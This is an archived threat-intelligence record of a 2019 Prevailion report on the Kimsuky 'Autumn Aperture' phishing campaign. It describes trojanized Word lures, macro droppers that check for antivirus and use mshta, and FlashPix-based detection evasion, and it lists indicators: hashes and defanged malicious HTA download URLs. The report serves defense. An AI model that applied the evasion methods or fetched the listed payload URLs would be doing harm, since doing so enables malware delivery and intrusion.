{ "id": "02691282-e163-4aa5-8347-878703383dc8", "created_at": "2026-04-06T00:19:27.981193Z", "updated_at": "2026-04-10T13:12:23.193085Z", "deleted_at": null, "sha1_hash": "22aa97fbe1774e71f2aca9357996022211cf9d81", "title": "Autumn Aperture Report", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 779238, "plain_text": "Autumn Aperture Report\r\nPublished: 2019-09-11 · Archived: 2026-04-05 18:37:33 UTC\r\nAutumn Aperture: Threat Campaign Highlights New Evasion Technique using an Antiquated File Format  \r\nOverview\r\nIn what is assessed to be an expansion of a coordinated effort to target U.S.-based entities, an emerging and\r\nincreasingly sophisticated campaign employing obscure file formats poses significant risk — and highlights the\r\nneed for vigilance around third-party relations. \r\nAfter detecting several related trojanized documents — all discussing nuclear deterrence, North Korea’s nuclear\r\nsubmarine program, and North Korean economic sanctions — Prevailion has determined the existence of a\r\ncoordinated threat campaign. We have dubbed the campaign “Autumn Aperture” and have associated it — with\r\nmoderate confidence — to the Kimsuky, a.k.a. “Smoke Screen”, threat actors. \r\nTo increase the effectiveness of their campaign, the threat actors obtained documents written by industry experts.\r\nThe threat actors then appended their malware into these Microsoft Word files. Document metadata indicates that\r\nthese operations occurred throughout the summer of 2019 with the most recent wave of documents likely being\r\nsent around 20 August 2019. \r\nThis campaign also denoted an evolution in the threat actors’ techniques, as they shifted to more obscure file\r\nformats (Kodak FlashPix), resulting in a significantly lower detection rate by anti-virus (AV) products.\r\nWe hypothesize that these documents, sent via a socially engineered email, would have likely been anticipated by\r\nthe intended victims, thus increasing the threat actors’ chance of success. Some document examples include:\r\nTrojanizing a conference speaker’s notes after his presentation at Nuclear Deterrence summit.\r\nTrojanizing a report from a U.S. university affiliate discussing North Korea’s new ballistic missile\r\nsubmarine (SSB) capabilities.\r\nImpersonating the U.S. Department of Treasury and sending a renewal notice for a sanctions license. \r\nAutumn Aperture’s increasingly sophisticated tools still employ the use of a common email threat delivery\r\nmechanism that can be incorporated into an organization’s risk mitigation plans. Given the scope of entities\r\ntargeted by this campaign, there is an increased likelihood that a third party within an organization’s ecosystem is\r\nat risk of exposure. \r\nBased on the indicators of compromise we’ve collected on Autumn Aperture, we encourage organizations to\r\nassess existing risk profiles, review emergency response plans, and ensure that employees know to immediately\r\ncontact the appropriate IT or network security resource if they are prompted to enable macros on any document. \r\nhttps://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nPage 1 of 11\n\nTechnical Details\r\nTrojanized Documents\r\nThe most recent document associated with this campaign was titled “NK new SSB shown with Kim 22-7-2019”.\r\nDocument metadata shows that this document was created by a U.S. based university affiliate and, despite its title,\r\nwas modified on 20 August by the threat actors. \r\nConsistent with historical trends, the threat actors continued to trojanize genuine documents. Throughout this\r\ncampaign, when victims viewed the documents in an application, the malware would display a prompt to enable\r\nmacros. Once macros were enabled, the document would then display the content — in this case, a report on the\r\nconstruction of a new ballistic missile submarine (SSB) facility — while surreptitiously installing additional\r\nmalware on the victim's computer. \r\nSSB phishing lure used to target victims\r\nWe also discovered another malicious document, likely deployed earlier this summer. This document used the\r\nsame technique embedding images with instructions to enable macros. \r\nhttps://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nPage 2 of 11\n\nOnce macros were enabled, the user would see a document that appeared to be from the U.S. Treasury\r\nDepartment, which granted the Carnegie Corporation of New York a sanctions license. As before, enabling macros\r\nallowed the malware to install additional payloads on the victim’s computer.\r\nNorth Korea sanctions regulations lure\r\nIn one particular case, we identified a Bitly link that was sent to some victims of this campaign. When the Bitly\r\nlink was expanded, it revealed the shortened actor-controlled URL. Additionally, this expansion page showed how\r\nmany people clicked the link and when it was clicked. If a victim visited the URL, the resulting webpage would\r\ndownload a file rar, which contained a trojanized document summarizing a talk from the Nuclear Deterrence\r\nsummit.\r\nhttps://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nPage 3 of 11\n\nWhile we observed multiple iterations of this lure, metadata shows that the original document was created by a\r\nspeaker at the Nuclear Deterrence Summit and then modified by the threat actors. The content of this lure suggests\r\nthat it was likely targeted towards conference attendees and/or others who had an interest in what took place at the\r\nconference. \r\nThis particular document was previously referenced in a report by ESTSecurity, and its embedded domain was\r\nincluded in a report by the Agence Nationale de la Sécurité des Systèmes d'Information (ANSSI). This indicates\r\nthat the Autumn Aperture campaign was likely a continuation of a previously reported activity from this threat\r\ngroup.  \r\nhttps://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nPage 4 of 11\n\nNuclear Deterrence summit lure\r\nVisual Basic Scripts and Kodak FlashPix Format Files\r\nEarlier in 2019, the trojanized documents contained a very small, simple macro that would automatically open,\r\nthen call mshta.exe to run an executable HTML (HTA) file. The threat actors have since fortified their documents\r\nwith several new functionalities, such as an added feature to enumerate the host machine and experimented with\r\npassword protecting their documents.\r\nhttps://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nPage 5 of 11\n\nAnother feature would call Windows Management Instrumentation (WMI) to determine if it was safe to obtain the\r\nnext payload on the host machine. The dropper would obtain a list of running processes and services, then\r\ncompare that output to a list of known anti-virus products. In July, the script would check for the presence of the\r\nfollowing anti-virus products:\r\nMalware Bytes\r\nWIndows Defender \r\nMcafee\r\nIn August, the threat actors added functionality to also check for: \r\nSophos\r\nTrendMicro\r\nhttps://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nPage 6 of 11\n\nScreenshot of the anti-detection checks used in the July Campaign\r\nOnce the dropper determined that it was safe to run on the host machine, it would perform some host-based\r\nenumeration by attempting to obtain stored credentials. As in earlier campaigns, the dropper would use mshta.exe\r\nto obtain the HTA payloads hosted on compromised domains. The executable would be saved in\r\n%APPDATA%\\tmp0.bat. The script would then create a scheduled task to run the payload using wscript.exe.\r\nThe last new feature of the script would attempt to obtain the application’s version number — in most cases this\r\nwould likely be the version of Microsoft Word — and then send the result to another actor-compromised domain,\r\npirha[.]net/p/php?op=[version number].\r\nhttps://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nPage 7 of 11\n\nScreenshot of the application version feature\r\nTo hide this new functionality, the threat actor embedded it in a Kodak FlashPix file format (FPX). According to\r\nVirusTotal testing, the FPX file format has a significantly lower dectection rate, dropping the initial detection rate\r\nto 8/57 AV products. Whereas the standard file format, VBA, had an initial detection rate of  23/57.\r\nScreenshot of the FPX detection rate on 23 July 2019\r\nhttps://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nPage 8 of 11\n\nScreenshot of the VBA detection rate on 9 June 2019\r\nThis was likely done as AV products have numerous signatures designed to inspect VBA files; while FPX files\r\nhave not received the same level of scrutiny. As a result, FPX files are less likely to be subsequently flagged as\r\nmalicious. We found samples suggesting that the threat actors have been using this file format since at least July.\r\nConclusion \r\nThese threat actors’ TTPs are evolving and continue to be refined with each new operation. While this type of\r\noperation did require some user interaction (pressing the macro button), the malware would do the rest in the\r\nbackground, hidden from the victim. \r\nThis technique followed a wider trend that we are observing across multiple threat actor groups, in which they\r\nsocially engineer victims with an image rather than relying on an exploit. Several actors are creating more robust\r\ndroppers to better protect their tool sets and increase their chances of operating without discovery. These changes\r\nreflect a highly motivated threat actor, likely to continue performing operations.\r\nWhile the TTPs continue to evolve and increase in sophistication, this campaign still relies on a relatively simple\r\nbut effective email fraud attack method. Business email compromise (BEC) — the traditional document delivery\r\nmethod used for campaign Autumn Aperture — is the leading driver for insurance giant AIG’s Europe, Middle\r\nEast \u0026 Africa (EMEA) region cyber insurance claims. \r\nBEC compromises are a growing threat, up from 11% of AIG EMEA’s reported cyber claims in 2017 to account\r\nfor 23% in 2018. AIG EMEA’s 2018 cyber claims data indicates a wide range of sectors are vulnerable to BEC\r\nattacks, with professional services, financial services, business services, and public entity \u0026 non-profit industries\r\naccounting for almost 60% of all 2018 claims.  \r\nhttps://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nPage 9 of 11\n\nGiven the broad scope of entities targeted by Autumn Aperture, there is an increased likelihood that a third party\r\nwithin an organization’s ecosystem is at risk of exposure. Based on this information and the indicators of\r\ncompromise Prevailion has collected on Autumn Aperture, we encourage organizations to assess existing risk\r\nprofiles, review emergency response plans, and ensure that employees know to immediate contact the appropriate\r\nIT or network security resource if prompted to enable macros on a downloaded document. For more information\r\nabout threat modeling and 3rd party risk mitigation, attending Elizabeth’s talk on September 12th at the Tactical\r\nEdges International CISOs Summit. (1)\r\n(1) Cyber Claims: GDPR and business email compromise drive greater frequencies;\r\nhttps://www.aig.co.uk/content/dam/aig/emea/regional-assets/documents/aig-cyber-claims-2019.pdf\r\nIndicators of Compromise \r\nFile Hashes\r\n039285c83a25291bd91608daaac2941e4abc4c6eff97e02fe0991918e101201f\r\nBfca0a3a506b770948475b09bee6e5613e2080e37802b52f8162366a83c4c3ae\r\na09aec4ecafabb4ae607bb25cbdb96f00ccc1d2dd49e941e07cd4ad292a58441\r\nE8145f09c83163bbe429f5a5c282b57e7921e7b40339820389522146516604b1\r\nc60e9c71460e4f583da8179a606eb2f84412e003b00096c9f699fa3d2854eb7b\r\nD1b5d606c866c304c3eb28fc52ed700c6b292e6e4387e0dac1a895e231bfe5b3\r\n9255280904f85d01545d295a31038678d697325385be6c7c01435d541f16b043\r\n23c18fe6675b4dad5e1354718fa9bbb096ded4293948d318d0057b51642c4cbb\r\n63c45dd760256bb2bee1eeb9e7d61601c90a752ff46832df39ca1a8d2376b281\r\nAead266f97c936799f4d5f526482d41f74daf86f8fcf49976eecbc6260b59274\r\n327426b389a87fb41c5150f18c8a3b1b5c671eb08107a3a6917baea3db686555\r\nBf838c2e46696f79964709e29880604d7172f2a3ab0f3f41d7ff8216f053c557\r\n0dc17133b9d54b8d38f5a4f4c49eb0cee7ff2c80b1ea614fb59ca49c3721440b\r\nF408dee7fa76179d826885c5c6f38acbcc11f3e3abba1f1f58068cdf833b4317\r\n3b2701a7d49a8d6002a2a202bac9b18b4bc917009da01591ab5b66f183f9c8e9\r\n01313c4e2c821d7d57ec5d60a7b4f6364e3a0cb3715e8a626853dd9a8ef005b7\r\nFc3a75ace13d53d00aef19b7b72b2742ecf5734292680d3106176cf64d1fee18\r\nB862add44ef0d3418aa82fd674da2d7446c7a293844a4986414f96d8aae2d58f\r\nhttps://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nPage 10 of 11\n\nDc5d140c772a63252753f51f98feb4066996a1bc77ff13aa77d4764fccd01cd4\r\n4aaaaf94ba870fa7b500883154c7da1f9639ecdd76af42ee9fe408970d6f24d3\r\n82286cf6369eddd2e79d005a435623abe2db642c216d38550411865acf84210e\r\n9c6f6db86b5ccdda884369c9c52dd8568733e126e6fe9c2350707bb6d59744a1\r\nAc4f6bdd6d4ef009f1108c4c8a3d58e0a19d4f73b239202dd601b0aeba5ceb54\r\nF602b7ed04cd538bead5a7fe79913ea273546a996baee33fedf2ecd417efae78\r\nAd0d0c84025f978975a7cdde4eabc2457ba414a696601d33ea6e071bbbfbf5f3\r\n5531d6a9b70c612a897a80b43d001f9329badb8b26be27d14645f42abb689400\r\nURLs \r\nhxxps://pirha[.]net/1.php?op=\r\nhxxps://somalidoc[.]com/generator/data/js/Vamva0[.]hta\r\nhxxps://www[.]webfindsolucoes[.]com/wp-includes/widgets/fred/Rnlnb0[.]hta\r\nhxxps://www[.]eventosatitlan[.]com/includes/includes/js/ja/Qbjoo0[.]hta\r\nhxxps://www[.]atnitalia[.]com/wp-includes/js/tinymce/utils/share/Lfvbu0.hta\r\nhxxp://atnitalia[.]com/wp-includes/js/tinymce/utils/share/upload[.]php\r\nhxxp://evangelia[.]edu/image/bin/Rjboi0[.]hta\r\nhxxps://login-main[.]bigwnet[.]com/attachment/view/Msgxo0[.]hta\r\nAbout Prevailion\r\nPrevailion is a compromise intelligence company, transforming the way organizations approach risk mitigation\r\nand business decision-making. Through next-level tailored intelligence and a zero-touch platform, Prevailion\r\nprovides confirmed evidence of compromise for customers and their partner ecosystems.\r\nSource: https://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nhttps://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://web.archive.org/web/20200401171809/https://blog.prevailion.com/2019/09/autumn-aperture-report.html" ], "report_names": [ "autumn-aperture-report.html" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434767, "ts_updated_at": 1775826743, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/22aa97fbe1774e71f2aca9357996022211cf9d81.pdf", "text": "https://archive.orkl.eu/22aa97fbe1774e71f2aca9357996022211cf9d81.txt", "img": "https://archive.orkl.eu/22aa97fbe1774e71f2aca9357996022211cf9d81.jpg" } }